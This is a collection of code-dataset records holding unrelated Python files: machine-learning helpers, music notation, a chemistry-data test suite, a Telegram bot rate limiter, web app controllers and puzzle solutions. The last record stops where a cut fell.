_validate_stochastic_hparams(target_layer_name: str,\n stochastic_method: str,\n drop_rate: float,\n drop_distribution: str,\n drop_warmup: str = \"0dur\"):\n \"\"\"Helper function to validate the Stochastic Depth hyperparameter values.\"\"\"\n\n if stochastic_method and (stochastic_method not in _STOCHASTIC_LAYER_MAPPING):\n raise ValueError(f\"stochastic_method {stochastic_method} is not supported.\"\n f\" Must be one of {list(_STOCHASTIC_LAYER_MAPPING.keys())}\")\n\n if target_layer_name and (target_layer_name not in _STOCHASTIC_LAYER_MAPPING[stochastic_method]):\n raise ValueError(f\"target_layer_name {target_layer_name} is not supported with {stochastic_method}.\"\n f\" Must be one of {list(_STOCHASTIC_LAYER_MAPPING[stochastic_method].keys())}\")\n\n if drop_rate and (drop_rate < 0 or drop_rate > 1):\n raise ValueError(f\"drop_rate must be between 0 and 1: {drop_rate}\")\n\n if drop_distribution and (drop_distribution not in _VALID_LAYER_DISTRIBUTIONS):\n raise ValueError(f\"drop_distribution '{drop_distribution}' is\"\n f\" not supported. Must be one of {list(_VALID_LAYER_DISTRIBUTIONS)}\")\n\n if stochastic_method == \"sample\" and Time.from_timestring(drop_warmup).value != 0:\n raise ValueError(f\"drop_warmup can not be used with 'sample' stochastic_method\")\n\n\ndef _update_drop_rate(module: torch.nn.Module, stochastic_block: Type[torch.nn.Module], drop_rate: float,\n drop_distribution: str):\n \"\"\"Recursively updates a module's drop_rate attributes with a new value.\"\"\"\n\n if (len(list(module.children())) == 0 and len(list(module.parameters())) > 0):\n return\n else:\n for child in module.children():\n if isinstance(child, stochastic_block):\n if drop_distribution == 'uniform':\n current_drop_rate = drop_rate\n elif drop_distribution == 'linear':\n current_drop_rate = ((child.module_id + 1) / child.module_count) * drop_rate # type: ignore\n else:\n raise ValueError(f\"drop_distribution '{drop_distribution}' is\"\n f\" not supported. Must be one of {list(_VALID_LAYER_DISTRIBUTIONS)}\")\n child.drop_rate = torch.tensor(current_drop_rate)\n _update_drop_rate(child, stochastic_block, drop_rate, drop_distribution)\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/algorithms/stochastic_depth/stochastic_depth.py","file_name":"stochastic_depth.py","file_ext":"py","file_size_in_byte":15184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72994616489","text":"import itertools\nfrom abjad import *\nfrom aurora.nouns.colors import *\nfrom aurora.nouns.figures import *\nfrom abjad.tools.abctools import AbjadObject\nfrom aurora.utils.durutils import partition_duration_by_nested_grids_and_offset\n\n\nclass BowingTranscriber(AbjadObject):\n \n def __init__(self):\n pass\n\n def __call__(self, timespan, instrument):\n \n bowing_container = Container([])\n\n # create one container per figure\n # fill each container with 32nd notes / skips\n for figure in timespan['figures']:\n container = Container([])\n ticks = int(figure.duration / Duration(1, 32))\n container.append(Note(0, Duration(1, 32)))\n container.extend(scoretools.Skip(Duration(1, 32)) * (ticks - 1))\n bowing_container.append(container)\n\n # convert pizz containers to rests\n # apply circular and jete style\n for i, figure in enumerate(timespan['figures']):\n if isinstance(figure['right'], RightHandPizzicato):\n bowing_container[i][:] = scoretools.make_rests([Duration(1, 32)] \\\n * len(bowing_container[i]))\n# spannertools.HiddenStaffSpanner(bowing_container[i])\n elif isinstance(figure['right'], RightHandJete):\n override(bowing_container[i]).glissando.style = 'dashed-line'\n elif isinstance(figure['right'], RightHandCircular):\n override(bowing_container[i]).glissando.style = 'zigzag'\n\n # split containers prior to rest containers, as well as final containers \n for i, container in enumerate(bowing_container):\n if isinstance(container[0], Rest):\n if 0 < i and isinstance(bowing_container[i - 1][0], Note):\n bowing_container[i - 1][-1] = Note(0, Duration(1, 32))\n if not isinstance(bowing_container[-1][0], Rest):\n bowing_container[-1][-1] = Note(0, Duration(1, 32))\n\n # apply position information to each non-rest container\n for i, figure in enumerate(timespan['figures']):\n if not isinstance(bowing_container[i][0], Rest):\n bowing_container[i][0].written_pitch = figure['position'][0].pitch\n if not isinstance(bowing_container[i][-1], scoretools.Skip):\n bowing_container[i][-1].written_pitch = figure['position'][1].pitch\n\n # apply circular pitch\n for i, figure in enumerate(timespan['figures']):\n if isinstance(figure['right'], RightHandCircular):\n bowing_container[i][0].written_pitch = 0\n if not isinstance(bowing_container[i][-1], scoretools.Skip):\n bowing_container[i][-1].written_pitch = 0\n if i < (len(bowing_container) - 1) \\\n and not isinstance(bowing_container[i + 1][0], Rest):\n bowing_container[i + 1][0].written_pitch = 0\n \n # apply pressure spanner ??\n groups = []\n group = []\n for i, figure in enumerate(timespan['figures']):\n if isinstance(figure['right'], (RightHandJete, RightHandPizzicato)) \\\n or not isinstance(figure['pressure'][0], OverPressure):\n if group:\n groups.append(group)\n group = []\n else:\n group.append(i)\n if group:\n groups.append(group)\n for group in groups:\n for i in group:\n components = bowing_container[i]\n spanner = spannertools.make_solid_text_spanner_with_nib(\n left_text=r\"\\filled-box #'(0 . 1.5) #'(-0.75 . 0.75) #0\",\n direction=Up,\n )\n attach(spanner, components)\n\n # gliss\n groups = []\n group = []\n for i, figure in enumerate(timespan['figures']):\n if isinstance(figure['right'], RightHandPizzicato) \\\n and len(group):\n groups.append(group)\n group = []\n else:\n group.append(i)\n if group:\n groups.append(group)\n for group in groups:\n for i in group:\n glissando = spannertools.Glissando() \n attach(glissando, bowing_container[i])\n\n # test and return\n assert inspect(bowing_container).get_duration() == timespan.duration\n return bowing_container\n","repo_name":"josiah-wolf-oberholtzer/aurora","sub_path":"aurora/nouns/transcribers/BowingTranscriber.py","file_name":"BowingTranscriber.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10164491807","text":"\"\"\"\nTests for downloading and processing Moonshot data from CDD.\n\"\"\"\nimport os\n\nimport pytest\nfrom asapdiscovery.data.moonshot import (\n CDD_URL,\n MOONSHOT_ALL_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_W_DATES_SEARCH,\n download_molecules,\n download_url,\n)\nfrom asapdiscovery.data.testing.test_resources import fetch_test_file\nfrom numpy.testing import assert_allclose\n\n# Columns added by filter_molecules_dataframe\nFILTER_ADDED_COLS = [\"name\", \"smiles\", \"achiral\", \"racemic\", \"enantiopure\", \"semiquant\"]\n\n# Columns added by parse_fluorescence_data_cdd\nPARSE_ADDED_COLS = [\n \"IC50 (M)\",\n \"IC50_stderr (M)\",\n \"IC50_95ci_lower (M)\",\n \"IC50_95ci_upper (M)\",\n \"pIC50\",\n \"pIC50_stderr\",\n \"pIC50_range\",\n \"pIC50_95ci_lower\",\n \"pIC50_95ci_upper\",\n \"exp_binding_affinity_kcal_mol\",\n \"exp_binding_affinity_kcal_mol_stderr\",\n \"exp_binding_affinity_kcal_mol_95ci_lower\",\n \"exp_binding_affinity_kcal_mol_95ci_upper\",\n]\n\n\n@pytest.fixture(scope=\"session\")\ndef cdd_header():\n try:\n token = os.environ[\"CDDTOKEN\"]\n except KeyError:\n # All tests need to be able to download files, so stop early if there's no API key\n pytest.exit(\"CDDTOKEN environment variable not set.\", 1)\n\n return {\"X-CDD-token\": token}\n\n\n@pytest.fixture(scope=\"session\")\ndef moonshot_vault():\n try:\n vault = os.environ[\"MOONSHOT_CDD_VAULT_NUMBER\"]\n except KeyError:\n # All tests need to be able to download files, so stop early if there's no API key\n pytest.exit(\"MOONSHOT_CDD_VAULT_NUMBER environment variable not set.\", 1)\n\n return vault\n\n\n@pytest.fixture(scope=\"session\")\ndef moonshot_saved_searches(tmp_path_factory, cdd_header, moonshot_vault):\n # Hashes of the saved search downloads for quick comparison\n # Unless we get really unlucky, files downloaded within a few minutes of each other\n # should contain the same entries\n from hashlib import sha256\n\n def dl_and_hash(search, fn_out):\n url = f\"{CDD_URL}/{moonshot_vault}/searches/{search}\"\n response = download_url(url, cdd_header, vault=moonshot_vault)\n\n with fn_out.open(\"w\") as fp:\n fp.write(response.content.decode())\n\n return sha256(response.content).hexdigest()\n\n dl_dir = tmp_path_factory.mktemp(\"cache\", numbered=False)\n hash_dict = {\n search: dl_and_hash(search, dl_dir / search)\n for search in [\n MOONSHOT_ALL_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_W_DATES_SEARCH,\n ]\n }\n\n return dl_dir, hash_dict\n\n\n@pytest.fixture\ndef filter_df_files():\n \"\"\"\n Fetch all possible combination of output filtering CSV files. Filenames are built by\n all filter kwargs that are True, put together in the following order:\n * achiral\n * racemic\n * enantiopure\n * semiquant\n \"\"\"\n from itertools import product\n\n fn_labels = [\"achiral\", \"racemic\", \"enantiopure\", \"semiquant\"]\n out_fn_dict = {}\n # achiral, racemic, enant, semiquant\n for flags in product([True, False], repeat=len(fn_labels)):\n out_fn = \"_\".join([label for label, flag in zip(fn_labels, flags) if flag])\n out_fn = fetch_test_file(\n \"test_filter\" + (f\"_{out_fn}\" if out_fn else \"\") + \"_out.csv\"\n )\n out_fn_dict[flags] = out_fn\n\n in_fn = fetch_test_file(\"test_filter_in.csv\")\n\n return in_fn, out_fn_dict\n\n\n@pytest.fixture\ndef parse_df_files():\n \"\"\"\n Fetch all possible combination of output parsed CSV files. Filenames are built by\n bool representations of keep_best_per_mol and cp_values.\n \"\"\"\n from itertools import product\n\n fn_labels = [\"best\", \"cheng\"]\n out_fn_dict = {}\n for flags in product([True, False], repeat=len(fn_labels)):\n out_fn = \"_\".join([label for label, flag in zip(fn_labels, flags) if flag])\n out_fn = fetch_test_file(\n \"test_parse\" + (f\"_{out_fn}\" if out_fn else \"\") + \"_out.csv\"\n )\n out_fn_dict[flags] = out_fn\n\n in_fn = fetch_test_file(\"test_parse_in.csv\")\n\n return in_fn, out_fn_dict\n\n\n@pytest.fixture\ndef cdd_col_headers():\n return {\n MOONSHOT_ALL_SMI_SEARCH: [\n \"Molecule Name\",\n \"Batch Created Date\",\n \"Batch Updated Date\",\n \"Canonical PostEra ID\",\n \"stereochem comments\",\n \"shipment_SMILES\",\n \"suspected_SMILES\",\n \"why_suspected_SMILES\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Lower) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Upper) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Hill slope\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Curve class\",\n ],\n MOONSHOT_NONCOVALENT_SMI_SEARCH: [\n \"Molecule Name\",\n \"CDD Number\",\n \"Canonical PostEra ID\",\n \"Scaffold\",\n \"stereochem comments\",\n \"shipment_SMILES\",\n \"suspected_SMILES\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Lower) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Upper) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Hill slope\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Curve class\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Avg pIC50\",\n ],\n MOONSHOT_NONCOVALENT_W_DATES_SEARCH: [\n \"Molecule Name\",\n \"CDD Number\",\n \"Batch Created Date\",\n \"Batch Updated Date\",\n \"Canonical PostEra ID\",\n \"Scaffold\",\n \"stereochem comments\",\n \"shipment_SMILES\",\n \"suspected_SMILES\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Lower) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: IC50 CI (Upper) (µM)\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Hill slope\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Curve class\",\n \"ProteaseAssay_Fluorescence_Dose-Response_Weizmann: Avg pIC50\",\n ],\n }\n\n\n@pytest.mark.parametrize(\n \"search\",\n [\n MOONSHOT_ALL_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_W_DATES_SEARCH,\n ],\n)\ndef test_fetch(cdd_header, moonshot_vault, search, cdd_col_headers):\n \"\"\"\n Test fetching all saved search.\n \"\"\"\n url = f\"{CDD_URL}/{moonshot_vault}/searches/{search}\"\n response = download_url(url, cdd_header, vault=moonshot_vault)\n assert response.ok\n\n # Check that the correct data was downloaded\n # different number of molecules depdending on when the download occurred, so just\n # check the column header\n content = response.content.decode()\n lines = content.split(\"\\n\")\n assert lines[0] == \",\".join(cdd_col_headers[search])\n\n\n@pytest.mark.parametrize(\"retain_achiral\", [True, False])\n@pytest.mark.parametrize(\"retain_racemic\", [True, False])\n@pytest.mark.parametrize(\"retain_enantiopure\", [True, False])\n@pytest.mark.parametrize(\"retain_semiquantitative_data\", [True, False])\ndef test_filter_df(\n retain_achiral,\n retain_racemic,\n retain_enantiopure,\n retain_semiquantitative_data,\n filter_df_files,\n):\n import pandas\n from asapdiscovery.data.utils import filter_molecules_dataframe\n\n in_fn, all_out_fns = filter_df_files\n flags = (\n retain_achiral,\n retain_racemic,\n retain_enantiopure,\n retain_semiquantitative_data,\n )\n out_fn = all_out_fns[flags]\n\n in_df = pandas.read_csv(in_fn)\n out_df = pandas.read_csv(out_fn)\n\n in_df_filtered = filter_molecules_dataframe(\n in_df,\n retain_achiral=retain_achiral,\n retain_racemic=retain_racemic,\n retain_enantiopure=retain_enantiopure,\n retain_semiquantitative_data=retain_semiquantitative_data,\n )\n\n assert in_df_filtered.shape[0] == out_df.shape[0]\n assert (\n in_df_filtered[\"name\"].values == out_df[\"Canonical PostEra ID\"].values\n ).all()\n\n\n@pytest.mark.parametrize(\"keep_best\", [True, False])\n@pytest.mark.parametrize(\"cp_values\", [None, [0.375, 9.5]])\ndef test_parse_fluorescence(keep_best, cp_values, parse_df_files):\n print(keep_best, cp_values, flush=True)\n import pandas\n from asapdiscovery.data.utils import parse_fluorescence_data_cdd\n\n in_fn, all_out_fns = parse_df_files\n flags = (keep_best, bool(cp_values))\n out_fn = all_out_fns[flags]\n\n in_df = pandas.read_csv(in_fn)\n out_df = pandas.read_csv(out_fn)\n\n in_df_parsed = parse_fluorescence_data_cdd(\n in_df, keep_best_per_mol=keep_best, cp_values=cp_values\n )\n\n # Check that range values were assigned correctly\n assert (in_df_parsed[\"pIC50_range\"] == out_df[\"pIC50_range\"]).all()\n\n # Columns with float vals to compare\n float_check_cols = [\n \"IC50 (M)\",\n \"IC50_stderr (M)\",\n \"IC50_95ci_lower (M)\",\n \"IC50_95ci_upper (M)\",\n \"pIC50\",\n \"pIC50_stderr\",\n \"pIC50_95ci_lower\",\n \"pIC50_95ci_upper\",\n \"exp_binding_affinity_kcal_mol\",\n \"exp_binding_affinity_kcal_mol_95ci_lower\",\n \"exp_binding_affinity_kcal_mol_95ci_upper\",\n \"exp_binding_affinity_kcal_mol_stderr\",\n ]\n for c in float_check_cols:\n assert_allclose(\n in_df_parsed[c].values,\n out_df[c].values,\n rtol=1e-05,\n atol=1e-08,\n equal_nan=True,\n err_msg=f\"{c} cols not equal\",\n )\n\n\n@pytest.mark.xfail\n@pytest.mark.parametrize(\n \"search\",\n [\n MOONSHOT_ALL_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_W_DATES_SEARCH,\n ],\n)\ndef test_download_molecules(\n cdd_header,\n moonshot_vault,\n search,\n cdd_col_headers,\n moonshot_saved_searches,\n tmp_path,\n):\n from hashlib import sha256\n\n import pandas\n\n # Download and check\n fn_out = tmp_path / \"out.csv\"\n fn_cache = tmp_path / \"cache.csv\"\n df = download_molecules(\n cdd_header,\n vault=moonshot_vault,\n search=search,\n fn_out=fn_out,\n fn_cache=fn_cache,\n )\n\n # Extra columns will be added\n target_cols = cdd_col_headers[search] + FILTER_ADDED_COLS + PARSE_ADDED_COLS\n assert sorted(df.columns.tolist()) == sorted(target_cols)\n\n df_loaded = pandas.read_csv(fn_out)\n assert sorted(df_loaded.columns.tolist()) == sorted(target_cols)\n\n assert (\n sha256(fn_cache.open(\"rb\").read()).hexdigest()\n == moonshot_saved_searches[1][search]\n )\n\n\n@pytest.mark.xfail\n@pytest.mark.parametrize(\n \"search\",\n [\n MOONSHOT_ALL_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_W_DATES_SEARCH,\n ],\n)\ndef test_download_molecules_cache(\n cdd_header, moonshot_vault, search, cdd_col_headers, moonshot_saved_searches\n):\n # First download file\n saved_fn = moonshot_saved_searches[0] / search\n\n # Search will only be run if loading from cache fails\n df = download_molecules(\n cdd_header,\n vault=moonshot_vault,\n search=\"non_existent_search\",\n fn_cache=saved_fn,\n )\n target_cols = cdd_col_headers[search] + FILTER_ADDED_COLS + PARSE_ADDED_COLS\n assert sorted(df.columns.tolist()) == sorted(target_cols)\n","repo_name":"choderalab/asapdiscovery","sub_path":"asapdiscovery-data/asapdiscovery/data/tests/test_moonshot.py","file_name":"test_moonshot.py","file_ext":"py","file_size_in_byte":11668,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"6908822476","text":"import functools\nimport logging\nfrom datetime import timedelta\n\nfrom pyrogram.client import Client\nfrom pyrogram.types import Message\nfrom bot.redisc import rd\n\nLIMIT = 7\nEXPIRE = timedelta(seconds=30)\n\n\ndef ratelimited(limit=LIMIT, expires=EXPIRE):\n def decorator(func):\n @functools.wraps(func)\n async def run(_c: Client, _m: Message, *args, **kwargs):\n r = await rd.incr(_m.chat.id)\n if r == 1:\n await rd.expire(_m.chat.id, time=expires)\n if r > limit:\n ttl = await rd.ttl(_m.chat.id)\n logging.debug(f\"request times {r} exceed for user {_m.chat.id}\")\n await _m.reply(f\"Too many requests within {expires.seconds} seconds, wait {ttl} seconds\")\n return\n logging.debug(f\"request times {r} for user {_m.chat.id}\")\n await func(_c, _m, *args, **kwargs)\n return run\n return decorator\n\n\n","repo_name":"animeshxd/brcbot","sub_path":"bot/decorators/redis_rate_limiter.py","file_name":"redis_rate_limiter.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10252694289","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCollect and Interp data\nClean version w/o file path\n\nChristopher Liu\n8/16/2020\n\"\"\"\n\nimport numpy as np\nimport os\nfrom scipy.interpolate import interp1d\n\ndef extract():\n rnums = range(0,1300)\n gaugenos = [702,712,901,902,911,912]\n \n for rnum in rnums:\n outdir = '/XXX/run_%s/_output' % str(rnum).zfill(6)\n homepath = 'gauge_data/run_%s' % str(rnum).zfill(6)\n \n if not os.path.isdir(homepath):\n os.mkdir(homepath)\n \n for gaugeno in gaugenos:\n gfile = '%s/gauge%s.txt' % (outdir, str(gaugeno).zfill(5))\n gdata = np.loadtxt(gfile)\n t = gdata[:,1] # seconds\n eta = gdata[:,5] # surface elevation in meters\n \n eta_unif, tt = unif_data(eta,t,10)\n saveloc = '%s/gauge%s.txt' % (homepath, str(gaugeno).zfill(5))\n np.savetxt(saveloc, np.vstack((tt,eta_unif)).T, delimiter=',', header=\"t, eta\")\n \n# interpolate to uniform time grid for a given sample time\ndef unif_data(eta,t,sample_time):\n tt = np.arange(0., t[-1], sample_time)\n\n gaugefcn = interp1d(t, eta, kind='linear', bounds_error=False)\n eta_unif = gaugefcn(tt)\n \n return eta_unif, tt\n\ndef main():\n if not os.path.isdir('gauge_data'):\n os.mkdir('gauge_data')\n extract()\nmain()\n\n\n\n\n","repo_name":"chrismhl/tsunami","sub_path":"interp_clean.py","file_name":"interp_clean.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9989606797","text":"import torch\nimport argparse\n\nfrom rei.rei import REI\n\nfrom dataset.cvdb import CVDB_CVPR\nfrom physics.inpainting import Inpainting\nfrom transforms.shift import Shift\n\n\n\nparser = argparse.ArgumentParser(description='REI')\n# inverse problem configs:\nparser.add_argument('--task', default='inpainting', type=str,\n help=\"inverse problems=['ct', 'inpainting', 'mri'] (default: 'inpainting')\")\n\ndef main(cuda=0, gamma=0.01):\n args = parser.parse_args()\n\n device=f'cuda:{cuda}'\n\n pretrained = None\n lr_cos = False\n save_ckp = True\n report_psnr = True\n\n\n mask_rate = 0.3\n tau = 1e-2\n epochs = 500\n ckp_interval = 100\n schedule = [100, 200, 300, 400]\n batch_size = 1\n lr = {'G': 1e-4, 'WD': 1e-8}\n alpha = {'req': 1, 'sure': 1}\n\n noise_model = {'noise_type':'p',\n 'sigma':0,\n 'gamma':gamma}\n\n dataloader = CVDB_CVPR(dataset_name='Urban100', mode='train', batch_size=batch_size,\n shuffle=True, crop_size=(512, 512), resize=True)\n\n transform = Shift(n_trans=3)\n\n physics = Inpainting(img_heigth=256, img_width=256,\n mask_rate=mask_rate, device=device, noise_model=noise_model)\n\n rei = REI(in_channels=3, out_channels=3, img_width=256, img_height=256,\n dtype=torch.float, device=device)\n\n rei.train_rei(dataloader, physics, transform, epochs, lr, alpha, ckp_interval,\n schedule, pretrained, lr_cos, save_ckp, tau, report_psnr, args)\n\n\n\nif __name__ == '__main__':\n main(cuda=0, gamma=0.01)\n main(cuda=0, gamma=0.05)\n main(cuda=0, gamma=0.1)","repo_name":"edongdongchen/REI","sub_path":"demo_scripts/demo_inpainting.py","file_name":"demo_inpainting.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"53"} +{"seq_id":"42933229901","text":"def inventory():\n user = auth.user\n comp = get_user_company(user)\n membership = db(db.auth_membership.user_id == user.id).select().first()\n fields = (db.item.id, db.item.Name, db.item.Worth, db.item.Category, db.item.Status)\n headers = {'item.id': 'ID',\n 'item.Name': 'Name',\n 'item.Worth': 'Value (EUR)',\n 'item.Category': 'Category',\n 'item.Status': 'Status'}\n default_sort_order = [db.item.Name]\n form = SQLFORM.grid(db.item.company_id == comp.id, create=False, fields=fields, headers=headers,\n orderby=default_sort_order, maxtextlength=64, paginate=25,\n editable=True, deletable=auth.has_membership('ROLE_ADMIN'))\n return dict(user=user, company=comp, form=form, membership=membership)\n\n\ndef inventoryInUse():\n user = auth.user\n comp = get_user_company(user)\n membership = db(db.auth_membership.user_id == user.id).select().first()\n rows = db((db.item.Status == 'Taken')&(db.item.company_id == comp.id)).select()\n return dict(user=user, company=comp, rows=rows, membership=membership)\n\n\ndef addItem():\n form=SQLFORM(db.item)\n user = auth.user\n comp = get_user_company(user)\n membership = db(db.auth_membership.user_id == user.id).select().first()\n if form.process().accepted:\n new_item = db(db.item).select().last()\n db(db.item.id == new_item.id).update(company_id=comp.id)\n if new_item.Status == 'Taken':\n db(db.item.id == new_item.id).update(Taken=1)\n return dict(form=form, user=user, company=comp, membership=membership)\n\n\ndef removeItem():\n user = auth.user\n comp = get_user_company(user)\n\n return dict(user=user, company=comp)\n\n\ndef add_category():\n user = auth.user\n company = get_user_company(user)\n membership = db(db.auth_membership.user_id == user.id).select().first()\n form = SQLFORM(db.category).process()\n return locals()\n\n\ndef edit_item():\n user = auth.user\n company = get_user_company(user)\n membership = db(db.auth_membership.user_id == user.id).select().first()\n item = db.item(request.args(0, cast=int))\n form = SQLFORM(db.item, item)\n if form.process().accepted:\n if item.Status == 'Taken':\n new_count = int(float(item.Taken)) + 1\n db(db.item.id == item.id).update(Taken=new_count)\n return locals()\n\n\n@auth.requires_login()\ndef get_user_company(user):\n company = db(user.company_id == db.company.id).select().first()\n return company\n","repo_name":"daiarn/IMS","sub_path":"web2py/applications/InventoryManagement/controllers/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72429494249","text":"import sys\n\ndef rucksack_from_string(s):\n rucksack = s.rstrip()\n split_point = len(rucksack) // 2\n return (set(rucksack[:split_point]), set(rucksack[split_point:]))\n\ndef item_priority(item):\n if item >= 'a' and item <= 'z':\n return ord(item) - ord('a') + 1\n elif item >= 'A' and item <= 'Z':\n return ord(item) - ord('A') + 27\n else:\n return 0\n\ndef solve(file):\n priority_sum = 0\n for line in file:\n rucksack = rucksack_from_string(line)\n common = rucksack[0].intersection(rucksack[1])\n priority_sum += sum(map(item_priority, common))\n return priority_sum\n\ndef main():\n solution = solve(sys.stdin)\n print(solution)\n\nif __name__ == '__main__':\n main()\n","repo_name":"BinaryAlien/Advent-of-Code","sub_path":"2022/03/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71451281768","text":"from create_test_data import Tournament, Match, Player, compute_rank_scores\nfrom calculatePairwiseSeries import NUM_ITEMS\nimport random\nimport numpy as np\n\n# can fill this in manually if changes from calculatePairwiseSeries.py\n#NUM_ITEMS = 6\n\nif __name__ == \"__main__\":\n\tdata = []\n\twith open(\"generated_output.txt\", 'r') as filename:\n\t\tfor line in filename:\n\t\t\tdata.append(eval(line))\n\t\n\tplayers= [Player(str(i), i) for i in range(NUM_ITEMS)]\n\n\tmatches= []\n\tfor p in data:\n\t\tfor item in p:\n\t\t\t# pick 0 or 1\n\t\t\tindex = random.choice([0,1])\n\t\t\twinner = item[index]\n\t\t\t# flip bit with ^\n\t\t\tloser = item[index ^ 1]\n\t\t\tm = Match(players[winner], players[loser], index)\n\t\t\tmatches.append(m)\n\t\t\t\n\tt = Tournament(players, matches)\n\t\n\tfor p in t.players:\n\t\tp.wins=\t len(t.getMatchesWithWin(p))\n\t\tothers= [pprime for pprime in t.players if pprime != p]\n\t\tp.perOpponent(others, t)\n\t\t\n\tcompute_rank_scores(t)\n\t\n\t#print(players)\n\twith open('testing_video_ranks.txt', 'w') as filename:\n\t\tfor p in t.players:\n\t\t\tfilename.write(p.name)\n\t\t\tfilename.write(\"\\t\")\n\t\t\tfilename.write(str(p.probability))\n\t\t\tfilename.write(\"\\n\")","repo_name":"drwiner/SimpleBradleyTerry","sub_path":"random_pairwise_series.py","file_name":"random_pairwise_series.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19578851552","text":"\"\"\"Handlers collection of server model endpoints.\"\"\"\n\nfrom flask import jsonify, request\n\nfrom app.models import Server\nfrom app.utils import paginate_response\n\n\ndef get_servers():\n \"\"\"Retrieve all existing servers from database.\"\"\"\n page = request.args.get('page', 1, type=int)\n order_by = request.args.get('order_by')\n servers = Server.get_all(order_by=order_by)\n\n response = paginate_response(servers, page)\n return jsonify(response), 200\n\n\ndef create_server():\n \"\"\"Create new server instance.\"\"\"\n json_data = request.get_json()\n if not json_data:\n return jsonify({'error': 'No required input data provided.'}), 400\n\n data, errors = Server.from_dict(json_data)\n if errors:\n return jsonify(errors), 400\n\n server = Server.get(data.get('endpoint'))\n if server:\n return jsonify({'error': 'Server with this endpoint already exists.'}), 400\n\n # Create a new server instance\n server = Server(data)\n\n response = server.to_dict()\n return jsonify(response), 201\n\n\ndef get_server(endpoint):\n \"\"\"Retrieve single server instance from database.\"\"\"\n server = Server.get_server_stats(endpoint)\n if server is None:\n return jsonify({'message': 'Server instance could not be found.'}), 404\n\n response = server.to_dict()\n return jsonify(response), 200\n\n\ndef update_server(endpoint):\n \"\"\"Update server instance in database.\"\"\"\n server = Server.get(endpoint)\n if server is None:\n return jsonify({'message': 'Server instance could not be found.'}), 404\n\n # Update server instance\n json_data = request.get_json()\n server.update(json_data.get('title'))\n\n response = server.to_dict()\n return jsonify(response), 200\n","repo_name":"PetrushynskyiOleksii/shooter-stats","sub_path":"src/app/views/servers.py","file_name":"servers.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9715221464","text":"import pytest\nimport datetime\nfrom unittest.mock import patch\n\nfrom sqlalchemy import String\nfrom sqlalchemy.orm import declarative_base\n\nfrom pyramid_oereb.contrib.data_sources.standard.models import get_office, get_document\nfrom pyramid_oereb.contrib.data_sources.standard.sources.document import DatabaseSource\nfrom pyramid_oereb.core.records.documents import DocumentRecord\nfrom pyramid_oereb.core.records.office import OfficeRecord\nfrom pyramid_oereb.core.records.document_types import DocumentTypeRecord\nfrom pyramid_oereb.core.records.law_status import LawStatusRecord\n\n\n@pytest.fixture\ndef document_source_params(db_connection):\n yield {\n \"db_connection\": db_connection,\n \"model\": \"pyramid_oereb.contrib.data_sources.standard.models.main.Document\"\n }\n\n\n@pytest.fixture\ndef office_records():\n yield [\n OfficeRecord(\n {'de': 'Test1'},\n office_at_web={'de': 'www.example1.com'},\n uid='ch99',\n postal_code=4123,\n identifier=1\n ),\n OfficeRecord(\n {'de': 'Test2'},\n office_at_web={'de': 'www.example2.com'},\n uid='ch100',\n postal_code=4321,\n identifier=2\n )\n ]\n\n\n@pytest.fixture\ndef document():\n Base = declarative_base()\n Office = get_office(Base, 'test', String)\n Document = get_document(Base, 'test', String, Office)\n yield Document\n\n\n@pytest.fixture\ndef date_today():\n yield datetime.date.today()\n\n\n@pytest.fixture\ndef all_document_result_session(session, query, document, date_today, png_binary):\n class Query(query):\n def 